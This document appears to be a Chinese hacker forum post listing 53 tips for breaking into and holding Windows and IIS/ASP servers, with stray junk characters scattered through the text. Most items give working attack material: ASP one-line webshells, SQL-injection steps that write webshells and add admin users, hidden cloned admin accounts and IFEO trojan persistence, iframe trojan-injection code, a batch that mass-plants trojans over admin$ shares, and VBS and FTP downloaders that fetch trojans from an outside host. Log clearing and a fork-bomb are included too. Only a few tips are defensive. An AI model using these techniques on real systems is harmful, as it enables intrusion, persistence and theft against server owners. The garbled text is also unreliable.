Xp系统修改权限防止病毒或木马等破坏系统,cmd下,$ G5 p" x( B7 X
cacls C:\windows\system32 /G hqw20:R
; y) d. n- B. u; O; ]8 n思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入! J. c# ?2 |" U
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F/ T% ~1 N. Q, h, x- N( [+ x1 o
0 H0 G2 l% D" R; i! A, K/ |2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。 U' v$ @9 K" M& M! }' |
' {; W8 i1 E, {4 `0 |4 F' J6 O3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。! j3 a0 ^* f+ U* m6 ?% g6 N; F
8 N; s" u% S2 @+ p
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号; m$ ]. i7 M+ M4 f( Q* D+ t
2 h) y. @2 V. h$ M5、利用INF文件来修改注册表3 a/ a1 E+ e8 w7 b
[Version]
! y0 L7 B8 g! Q& {- }! R' P, |Signature="$CHICAGO$"
3 Z. Z7 W* z. P( ]2 _! U" |- f[Defaultinstall]
5 w' g: y2 ]1 j9 w3 y5 R/ q- NaddREG=Ating
3 J# p: x' r5 O- Y8 k, C7 \. e0 f" m[Ating]
: C; O/ R- R7 I+ @/ U9 E W5 u$ _HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"4 D% p' |* i2 n" y
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
; S- }+ Q* t5 Q [# i5 wrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径" Q$ p; ?7 ^" B) }4 ?1 v
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU$ U7 h* v# u$ F& l$ c
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
0 c# E8 w5 x! g, }1 ?2 U$ qHKEY_CURRENT_CONFIG 简写为 HKCC
- w* J" K; X. ^9 k9 A0 y0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
" C$ W7 P0 E2 b9 U"1"这里代表是写入或删除注册表键值中的具体数据) E! k/ a1 X$ k/ u( ~
0 f; U% m. x+ E" a% G* e6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,* {; m* ^6 _1 Q! w+ H M' Z
多了一步就是在防火墙里添加个端口,然后导出其键值2 z/ F3 M) G) W# [% }# x, I
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]+ P0 q: o' |) I
' W* b* B* }3 a) d3 _
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
0 `: r+ B- h# x5 ]8 ~. l1 \ [在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。6 V( \9 o, K5 B; r6 \6 X1 `+ K
# v& i/ H6 u: ^9 p z
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。! S* v- s/ z* F& h$ w
$ ]/ W' \4 y( w
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
. ^; i) [- e) Y" H! m) ~8 b. N可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
+ a5 b' h3 C& I5 U* D1 _* w! X: f! t# U4 r% b
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
) K; a4 T9 S7 L1 T' P: l8 @+ n$ u/ }6 i
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,& _, ]% z# b" g0 z: G/ @
用法:xsniff –pass –hide –log pass.txt
1 y. G, D% s) w
3 A, c% {5 l- f12、google搜索的艺术( L* a3 Z2 r0 O' l8 e
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”* j" W3 H3 _) S+ Z& A' W
或“字符串的语法错误”可以找到很多sql注入漏洞。
% O! l& `3 g2 U/ A$ o' G K) M+ w/ N/ s/ ~! R) S- [, d
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
+ W' g$ u1 h; e7 Y* S
; F) L% Q, S1 M; [/ @9 C3 p14、cmd中输入 nc –vv –l –p 1987 x' C/ Y. f" m! e( a
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃& t' ^$ H6 j) r! \- S: n3 ?* e+ y
9 Z; A' z/ c$ K5 `6 [
15、制作T++木马,先写个ating.hta文件,内容为0 g8 [" E& U" G8 d6 E" ]% f% {6 P
<script language="VBScript">. s4 V2 F' _6 X
set wshshell=createobject ("wscript.shell" )
2 K; e) K* V% w( J/ ga=wshshell.run("你马的名称",1)
! p) T/ B& x9 F: o# b: c2 a1 Mwindow.close1 E. V. y3 w1 I. m
</script>
5 [# s" _# M( l5 u再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
$ O3 M4 |! H- Y5 T
+ g; m" E# c+ w16、搜索栏里输入! P, V, X" U2 z6 ]$ ~
关键字%'and 1=1 and '%'='% r- u7 G0 r" p5 C4 L
关键字%'and 1=2 and '%'=', M* | y! {5 w ^% F0 u
比较不同处 可以作为注入的特征字符
4 p3 k6 q" y1 p( ?3 G# w" k+ Q
17、挂马代码<html>
) I& m6 u5 n9 d* H<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>8 }+ Q# K; k2 K
</html>
0 {) @1 D$ y/ ]' v! |) Z* }! t: x* E( M; D
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
8 R) L1 H1 f4 dnet localgroup administrators还是可以看出Guest是管理员来。
3 Z: ` D7 `- ?' G, a$ M6 \
5 O' C; ]1 d) K) E+ `/ y! G- j& ~19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等+ W; ]8 z* p z, b# B: h
用法: 安装: instsrv.exe 服务名称 路径
) K3 }* |5 [0 v卸载: instsrv.exe 服务名称 REMOVE/ |: y: S1 {4 j! Z' H# m
2 F* C: d6 G3 ~
: `) g" Y( ^6 T21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
( [# Q" O" Z1 |( m9 L不能注入时要第一时间想到%5c暴库。1 T e4 V) Q, b5 w+ @4 ]
8 o! U {$ g! u/ \+ s# i
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
) _7 h9 e) e/ Y# k# ^% ~: |2 U ^+ }
23、缺少xp_cmdshell时7 M; f1 _; r0 z# y% D
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'2 P. R9 V7 _! w- m4 ~
假如恢复不成功,可以尝试直接加用户(针对开3389的)3 j! f3 U8 s- Z0 ]$ d! q0 B
declare @o int. E) ? T M3 z. g5 O$ K
exec sp_oacreate 'wscript.shell',@o out5 m1 J R! g5 ^, D+ d
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员. J5 o$ g: q& l$ ]: }0 R+ N0 l( s
: S6 m: K# E" Y2 v- D; ^! u. ?" ~24.批量种植木马.bat
: o" d6 L/ P# ?, wfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中9 I) q6 [8 O: U5 d" |
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
5 K. s( w) h+ a扫描地址.txt里每个主机名一行 用\\开头0 C3 y+ H; N$ l4 ?: T; E
8 J' K* h2 r7 A
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
3 V; j* t- q# ^6 ] W' Z' [) e: S! G& q2 E3 F( [* G
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名., I: n" k8 o0 j9 Q
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.7 a1 c4 u2 I3 D' @0 a" [
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马1 `9 q5 A( t- Q/ O. _) n0 W$ f& ]
8 x- z' g" p: h( N27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
6 \1 |; t; M! T, Q然后用#clear logg和#clear line vty *删除日志
) H' C9 B' c/ q; ~5 |: \2 x w% g2 A% ?# v9 Z' Z8 k' _" h/ J
28、电脑坏了省去重新安装系统的方法
* j; Y# s! n0 x, k j# t纯dos下执行,9 ~# H# e' `# k0 d! C
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config k3 \4 P2 p! ^
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
4 u9 [* O; n' a+ U$ ^/ V* s1 t- t& b3 y; r8 x2 E
29、解决TCP/IP筛选 在注册表里有三处,分别是: x& h9 y: Z/ Y7 M) w1 t" E
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
( O) {) [: a8 t! R( G: Z# SHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip5 C H2 ?6 ^! H9 [
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: R4 x. B+ J, x( ]分别用1 w+ X) r% M- p
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 h, t5 K: D- ~+ R- uregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip3 x5 k& }: n3 G
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; X- s2 g& u v* l, n
命令来导出注册表项
% \: g/ M; n( @0 j9 ]6 f/ @: a然后把三个文件里的EnableSecurityFilters"=dword:00000001,
5 ^0 i9 z: Q7 f" R( y, h# V改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用 a7 Y; D2 v; }, W+ e
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
8 j$ G0 I# k% i/ _8 g, |$ a1 t2 v+ r! }6 ^8 ~% w
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U* W8 u+ b! {$ d) }9 v" k
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
! C; k: ^" b3 Y
0 |' T' Y, N8 Z% |31、全手工打造开3389工具* y. @, U6 u0 P1 X: b& L4 E- H
打开记事本,编辑内容如下:
, V+ G. a" X8 p9 e/ J& hecho [Components] > c:\sql
7 c4 y' ~0 S7 Uecho TSEnable = on >> c:\sql
5 e8 y% N2 s4 W, l. ~1 B" |, Fsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
/ U9 J, Q% J" B编辑好后存为BAT文件,上传至肉鸡,执行" F4 C0 t* K. o+ L+ L \
% m2 A1 f: g! z L7 o3 ?( }% M$ _
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马' g' G1 h: ~& d6 c7 D @1 Q
$ O% T% O- }' |' S$ n33、让服务器重启9 v6 t9 S* W8 v/ z- g0 C+ R
写个bat死循环:
" Y- @8 |; m9 n- s+ C@echo off ]. [6 t5 f; y% K* X
:loop18 W) Z7 x. i( ]+ Z4 d) e6 T
cls
6 a: h# q- c+ fstart cmd.exe
7 I7 k% h) L3 Ogoto loop1
0 c1 v H d3 ?, R7 I) H保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
1 ~% v* ^; f9 [- x" p# ~
" N% l1 f" w9 O& p1 o34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
! G; c8 X; c" a0 S@echo off4 Q( V3 X: T& Y0 `* g
date /t >c:/3389.txt. D* T5 |+ w% G
time /t >>c:/3389.txt
5 O8 c% p3 t8 E' N7 v9 k* A! Pattrib +s +h c:/3389.bat
! X2 P( M/ m2 W) z9 n! oattrib +s +h c:/3389.txt
+ i2 P$ G7 B7 L, vnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
: b9 s* L, q* v* n2 L7 }. w( I并保存为3389.bat
- \( Z1 u( Y2 F+ ^) M打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号2 \( D* H4 |6 h! L5 B, O2 z. y# `
0 j, r, N4 x% x: }& g2 [& m2 u3 c35、有时候提不了权限的话,试试这个命令,在命令行里输入:( m8 Y2 v3 K& l! N5 s9 x) |
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)9 c$ R& h6 G3 T: E
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
3 ^* ?# J$ f2 z: Q' {+ d& l& a" R; O( l! C; ^: e
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
1 P) L: V3 Q; `% d! x {echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
$ V& u6 O% @$ becho 你的FTP账号 >>c:\1.bat //输入账号; l% J6 j6 f0 j+ i: H
echo 你的FTP密码 >>c:\1.bat //输入密码0 c( p' _9 o, G3 @$ t g
echo bin >>c:\1.bat //登入
9 p' `# H h. P) cecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
$ I' c& N" w. z9 uecho bye >>c:\1.bat //退出/ Q# |9 k+ [2 z; w7 @
然后执行ftp -s:c:\1.bat即可
- \3 S/ Z- ?: _6 f% a$ R* O+ ~9 U: n) u1 H, d7 b) N) `9 F. o
37、修改注册表开3389两法1 y, R' m. @& o0 c6 G1 o
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
/ e7 _" E9 [. ~4 f9 U. K- ?2 `echo Windows Registry Editor Version 5.00 >>3389.reg
* g: R0 K' h0 a6 X4 Lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
/ j. u9 i) g9 A4 I0 e% k7 Z5 fecho "Enabled"="0" >>3389.reg
, K& z! ~1 o4 e( ]3 B6 l6 U5 recho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" ^; m% k9 t/ ?* L$ h, L$ E1 g" l
NT\CurrentVersion\Winlogon] >>3389.reg+ k8 ?- W9 r0 U6 f- M3 P
echo "ShutdownWithoutLogon"="0" >>3389.reg( l- f1 \6 x6 [0 L2 |( G* C& S
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
7 b9 y( z7 \0 H4 o! y( c& N; o! q' f>>3389.reg
- i, S' m1 r$ o" R1 Becho "EnableAdminTSRemote"=dword:00000001 >>3389.reg. Q4 \+ a: E, ?. l1 j1 ^& [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]) F; o% I1 ~$ N/ I8 N+ O
>>3389.reg/ J( ~) f" S. y; m- v9 u/ k4 H
echo "TSEnabled"=dword:00000001 >>3389.reg4 P: d; u, @% H) h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg! s( M3 ]7 o: w; c6 C4 V# b
echo "Start"=dword:00000002 >>3389.reg! p5 E% Y4 S% V0 d# _3 N. Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
0 t0 R: b! U. {# {$ @0 l>>3389.reg- \/ A' m& I- e& P
echo "Start"=dword:00000002 >>3389.reg4 x a# u7 h+ ~( ]! W, E7 C' {
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
. f+ O! S' |3 Y# M1 wecho "Hotkey"="1" >>3389.reg
0 ?+ ]. i; x& oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" Y5 K. L# h+ v$ C7 v; e! tServer\Wds\rdpwd\Tds\tcp] >>3389.reg
, }5 j: E( J0 {0 P6 Wecho "PortNumber"=dword:00000D3D >>3389.reg& g+ A; ]: F4 J/ w! G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal, N0 `* i* K: G% G# Q
Server\WinStations\RDP-Tcp] >>3389.reg% Q* m3 D# b/ l% r" Y
echo "PortNumber"=dword:00000D3D >>3389.reg
9 H! {+ y1 e7 Y把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
1 C7 Y: J v4 E(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
3 Z V( P4 `6 a# ]. a# v因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效" j2 X0 H/ Z$ V8 G8 @( ^7 f3 \' Z$ R
(2)winxp和win2003终端开启" C& f+ d1 e9 D8 ~5 q) j/ c5 A, G& T
用以下ECHO代码写一个REG文件:8 ]" M9 q: k+ p q& ?
echo Windows Registry Editor Version 5.00>>3389.reg6 I) @+ ^, K% X- }3 x$ [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 m' g4 v6 [6 Q. @
Server]>>3389.reg
+ [* I. U+ C- L7 Mecho "fDenyTSConnections"=dword:00000000>>3389.reg% T2 h) e4 m7 r6 b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 \: H* I, K" c2 `. W3 n
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
# W* F& F( S2 g7 o# g& Yecho "PortNumber"=dword:00000d3d>>3389.reg
0 e3 J+ G# e secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; J% u, [/ K6 I! s7 `8 J
Server\WinStations\RDP-Tcp]>>3389.reg
+ ?7 \, Z% b; X0 l Fecho "PortNumber"=dword:00000d3d>>3389.reg
! l3 _2 I" v, C% @* f然后regedit /s 3389.reg del 3389.reg
' c# f$ F8 s, y7 AXP下不论开终端还是改终端端口都不需重启. V) S! H; X1 z- d- K" ^4 {
3 ~5 J3 k8 ^; U
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
* V$ z6 Q" p3 y用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'+ h0 C! G- }' I: e* p/ ^
3 I3 d* V+ E* Q4 I39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!0 t1 j" u* Z: u& B
(1)数据库文件名应复杂并要有特殊字符# n" u# \' S4 X0 y
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
6 y$ H) \& f9 [- o. s8 N将conn.asp文档中的
+ k- v# v7 z: \2 N( A+ eDBPath = Server.MapPath("数据库.mdb")
+ Y. T% v- |8 N+ y( |* F( [conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath6 L3 S+ U `( X
/ x8 ?2 ^' A0 Z9 p, H
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
' v3 x3 F$ ~6 u: c(3)不放在WEB目录里
2 Q) U+ b. ~$ r% @5 E! ?+ s: M# U2 r# e% g; F. F/ }
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉# \8 Z4 w% E8 j3 g7 D& b7 _4 R' i
可以写两个bat文件) m W! b( B( r* ?8 l
@echo off w, d/ I% X3 v+ @
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe+ \ D/ J- h* b5 V# R3 @
@del c:\winnt\system32\query.exe3 l% h+ a+ X: \" M) r
@del %SYSTEMROOT%\system32\dllcache\query.exe( R' M9 d W1 v; F; A3 |' q. T
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
( Y! s0 s9 e* r- L0 ]1 V% ^1 O: B% z
@echo off9 T( M% u5 s6 y, d
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
; Q7 v( b" ]$ d- w/ L4 D' I$ k@del c:\winnt\system32\tsadmin.exe* X( v/ y6 @7 s% z- L8 `3 |# S, l
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex; t Z1 J* m4 M
; I a, N7 D/ e; U41、映射对方盘符
) x& g% l6 w, s0 ztelnet到他的机器上,7 G3 }9 i; m" H6 x6 z
net share 查看有没有默认共享 如果没有,那么就接着运行
7 Z1 p0 R, ~% s, ^- C' nnet share c$=c:! I$ |# ^' T& ?' |
net share现在有c$
2 H; C( a* u5 H2 H- ~在自己的机器上运行
4 H" ~& |( V" h; K9 V" @net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K @; X, `5 H& h9 @" q: P; D# }( G5 m
) f4 f5 P7 S- Y4 M' Y* h: D42、一些很有用的老知识- w0 m8 F' Q) y( l: [
type c:\boot.ini ( 查看系统版本 )9 Z1 R1 _! L4 S! C) X
net start (查看已经启动的服务)1 z1 M. ^4 R* `! ^* d- b
query user ( 查看当前终端连接 ), G0 O, n/ {8 n& u/ U$ A( n' _3 @5 B
net user ( 查看当前用户 ) m4 \! @, w! ?3 Z. N8 R q+ m
net user 用户 密码/add ( 建立账号 )% K1 I1 F& \1 S7 Z4 L! g
net localgroup administrators 用户 /add (提升某用户为管理员)
5 Q7 u- b: F/ W/ uipconfig -all ( 查看IP什么的 )$ }; n' ^5 g2 \) T5 F- T- B( u) K
netstat -an ( 查看当前网络状态 ), s/ m7 I( j* L
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)- G4 n% l$ D: Z/ m' N | |
克隆时Administrator对应1F4
: }. P" L: z' E2 a3 T6 F6 lguest对应1F5
) L( T9 l8 \7 E. |tsinternetuser对应3E8 b" p4 |9 O& D/ a8 J# e c
# M/ Q: g. [; m43、如果对方没开3389,但是装了Remote Administrator Service* I( h+ u5 k- ^. l) R" R
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
+ f) i4 k( Z0 R: s; E0 M解释:用serv-u漏洞导入自己配制好的radmin的注册表信息! K% [) ~1 O$ q: Z
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"3 o1 H* ~9 _- l: X- R4 m+ L U
6 s9 i7 t, |6 T7 n, p44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
( P+ Y5 o" i4 Y# W- I$ ~6 y本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)0 N2 |! m/ c4 z& N2 s$ Y: D
1 n n$ t7 P Z45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
% e; d8 V2 l. j- }echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
7 g; u' @: E" y* t v7 {^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
0 W' M; t P% l% u/ n( K; ACreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =! y: h7 V! C4 G5 B9 P- v0 J
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
6 a K; k4 j" c( F- x" r2 h(这是完整的一句话,其中没有换行符)! @8 ?2 p5 f" ~3 |
然后下载:
+ c4 Y# H- `4 I/ |/ Tcscript down.vbs http://www.hack520.org/hack.exe hack.exe9 y2 ]7 a- {' f; {1 K- l* B
7 C2 @- ^% k9 K4 k8 q4 R3 S
46、一句话木马成功依赖于两个条件:, h" n# }$ L' C6 j5 q1 w
1、服务端没有禁止adodb.Stream或FSO组件
2 X) J# ~# v' ?7 D2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
" ` @& `1 \( V8 @% x2 D+ ~) P+ Q7 w, j% T5 q4 Z. f
47、利用DB_OWNER权限进行手工备份一句话木马的代码:6 {5 t$ V. S$ i7 S
;alter database utsz set RECOVERY FULL--% X! V5 T1 C; h$ T; ?' _
;create table cmd (a image)--" r* p+ w$ K3 N7 g) M8 u, }6 L( C
;backup log utsz to disk = 'D:\cmd' with init--3 N6 |$ N8 T! a
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
5 [' E8 v3 Q8 p# u7 \;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--, w5 S# N" D0 m. d/ I% c
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
5 e8 o: d6 Y% {" `- `5 p
4 R9 I/ N+ \9 M! N1 j( M* G* u48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
@/ y# \. T& u4 m1 T' T
3 Z/ j, }3 L/ P( y; y6 e% \用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options; H9 t3 i/ R& C- y4 M+ n
所有会话用 'all'。
; Q0 J7 w3 O* m/ E-s sessionid 列出会话的信息。/ n1 S7 }) t) F4 g* d* o
-k sessionid 终止会话。
- i1 k/ |9 k4 z$ O-m sessionid 发送消息到会话。
$ C0 t8 I1 X# q* @+ I: i, x2 a: m: C# P5 _7 N y1 B
config 配置 telnet 服务器参数。
+ m& | o4 e4 o1 k2 k2 v) |1 ?4 ~( R: f! L/ P
common_options 为:8 g$ e9 V, T5 Y1 B: C
-u user 指定要使用其凭据的用户
5 ]2 J% y& _; E* W-p password 用户密码/ ^2 s# b& s# v% b
. o& \2 _8 L) Wconfig_options 为:
9 n+ c- R# {5 |; R) kdom = domain 设定用户的默认域( O: J/ B+ b- D- h. ]' ]7 i$ Z
ctrlakeymap = yes|no 设定 ALT 键的映射, t `/ u8 A% W& T1 B4 ]; ^
timeout = hh:mm:ss 设定空闲会话超时值
5 }+ _9 @* J: R- d7 @1 @timeoutactive = yes|no 启用空闲会话。& R( Y9 Z7 ]9 u. Q
maxfail = attempts 设定断开前失败的登录企图数。
5 C, g+ O* }: L2 Pmaxconn = connections 设定最大连接数。
; M* m+ p2 u1 B+ T- Q0 Dport = number 设定 telnet 端口。- B6 M# _ _% p8 y- S2 k" t" @
sec = [+/-]NTLM [+/-]passwd
" A$ X8 y& \- ]/ g设定身份验证机构
( V: s: N3 z9 Y4 L+ I V" i, Afname = file 指定审计文件名。
$ y [; t, `' x# V& W! Lfsize = size 指定审计文件的最大尺寸(MB)。" t- ]+ C7 Q5 ?7 p6 Y! C0 D2 z
mode = console|stream 指定操作模式。3 m; m/ z7 } S+ ?
auditlocation = eventlog|file|both2 Z, g5 _- m# j5 S* r
指定记录地点2 H, Y' T% U: b+ d
audit = [+/-]user [+/-]fail [+/-]admin
' M" Q) F7 H( U: r% o: H% v; T: y A0 x5 x- _
49、例如:在IE上访问:3 z, r. X A! E& F; N* {
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
3 E* i* B/ R0 ]' qhack.txt里面的代码是:
" [# P6 q/ l* s<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
( R6 U! V' T6 _$ n把这个hack.txt发到你空间就可以了!, ]$ A% Z- z3 U1 a) P
这个可以利用来做网马哦!& E% Q1 L/ o1 y9 Q
7 r* d" O% Q! z# n B* R# C: P
50、autorun的病毒可以通过手动限制!5 l* L1 M! Z" s# m$ E1 H" m3 O6 G* X2 L
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!2 R: V! \: @# e& A" C8 i- O4 X7 w
2,打开盘符用右键打开!切忌双击盘符~- S) S4 v1 Z. c' q6 @/ ~. Q5 o
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
! x* |* C" P; d. l1 |
9 y! Z% g% a s+ \. C. E51、log备份时的一句话木马:
5 E0 X$ l. T& Aa).<%%25Execute(request("go"))%%25>) r' A/ O+ A; m; D
b).<%Execute(request("go"))%>
1 P8 s# D0 q; g$ F8 ^( u! Jc).%><%execute request("go")%><%
$ d" P% i3 o) r2 ed).<script language=VBScript runat=server>execute request("sb")</Script>/ G0 [2 s1 k6 o4 R2 q
e).<%25Execute(request("l"))%25># }: b2 ?0 F! R0 Z
f).<%if request("cmd")<>"" then execute request("pass")%>
4 V5 h2 n) N- {' X' p0 K/ b s% b, b u K' g. e& X, A5 F
52、at "12:17" /interactive cmd& m% I# E1 [7 o! p8 x1 W
执行后可以用AT命令查看新加的任务' Y: _0 v" D d! e( m
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
5 f/ r4 Z2 ^/ Y( G! y. T# \
) V" P N8 {! t. B9 c53、隐藏ASP后门的两种方法
! z2 \4 T# I' R Q# `# Q, o1、建立非标准目录:mkdir images..\. X5 L% q* X8 p1 u: s3 q1 a9 K. O
